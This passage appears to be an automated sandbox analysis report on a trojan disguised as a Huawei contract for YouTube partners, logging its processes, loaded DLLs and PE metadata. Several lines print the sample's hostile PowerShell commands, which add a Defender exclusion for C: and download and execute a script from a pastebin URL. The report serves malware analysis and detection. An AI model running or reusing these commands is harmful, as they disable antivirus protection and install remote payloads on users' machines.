Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245657663.00000277512F0000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Diagnostics.Process.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248658900.000002B7E90C1000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Collections.Concurrent.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3253056950.000002B7EB090000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Windows.Forms.Primitives.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: classification engineClassification label: mal100.troj.expl.evad.winEXE@14/18@4/5
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exeFile created: C:\Users\user\AppData\Roaming\notification_sent.flagJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1424:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6184:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5660:120:WilError_03
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exeFile created: C:\Users\user\AppData\Local\Temp\2025-02-17-13-35-39-screenshot.pngJump to behavior
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: [Huawei] Contract for YouTube partners.exeReversingLabs: Detection: 24%
Source: [Huawei] Contract for YouTube partners.exeVirustotal: Detection: 11%
Source: unknownProcess created: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe "C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe"
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jwryu2yd\jwryu2yd.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD333.tmp" "c:\Users\user\AppData\Local\Temp\jwryu2yd\CSC4A1A778723A0488D9C81AB4CE7B7E2B.TMP"
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'Jump to behavior
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content"Jump to behavior
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jwryu2yd\jwryu2yd.cmdline"Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD333.tmp" "c:\Users\user\AppData\Local\Temp\jwryu2yd\CSC4A1A778723A0488D9C81AB4CE7B7E2B.TMP"Jump to behavior
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exeSection loaded: icu.dllJump to behavior
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exeSection loaded: wshunix.dllJump to behavior
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exeSection loaded: devobj.dllJump to behavior
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exeSection loaded: amsi.dllJump to behavior
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: [Huawei] Contract for YouTube partners.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
Source: [Huawei] Contract for YouTube partners.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: [Huawei] Contract for YouTube partners.exeStatic file information: File size 72795027 > 1048576
Source: [Huawei] Contract for YouTube partners.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x61a800
Source: [Huawei] Contract for YouTube partners.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x17c600
Source: [Huawei] Contract for YouTube partners.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x157c00
Source: [Huawei] Contract for YouTube partners.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: [Huawei] Contract for YouTube partners.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: [Huawei] Contract for YouTube partners.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: [Huawei] Contract for YouTube partners.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: [Huawei] Contract for YouTube partners.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: [Huawei] Contract for YouTube partners.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: [Huawei] Contract for YouTube partners.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: [Huawei] Contract for YouTube partners.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Thread\Release\net8.0\System.Threading.Thread.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250591766.000002B7E9D51000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250619026.000002B7E9D60000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Net.Sockets.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248897242.000002B7E9280000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248955580.000002B7E92C1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Private.Xml\Release\net8.0-windows\System.Private.Xml.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249795196.000002B7E9680000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250073254.000002B7E9981000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Windows.Forms.Primitives.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3253245076.000002B7EB261000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3253056950.000002B7EB090000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.IO.FileSystem.DriveInfo.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245966712.00000277513E1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246764040.000002B7E5F40000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/System.Drawing.Common/Release/net8.0/System.Drawing.Common.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251017895.000002B7E9F11000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250944802.000002B7E9E90000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: Microsoft.Win32.Registry.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3244830292.000002774F971000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249770533.000002B7E9660000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Cryptography\Release\net8.0-windows\System.Security.Cryptography.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248833493.000002B7E91C1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248750883.000002B7E9100000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Security\Release\net8.0-windows\System.Net.Security.pdbSHA256H source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248518064.000002B7E9000000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248575013.000002B7E9051000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Net.Security.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248518064.000002B7E9000000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248575013.000002B7E9051000.00000020.00001000.00020000.00000000.sdmp
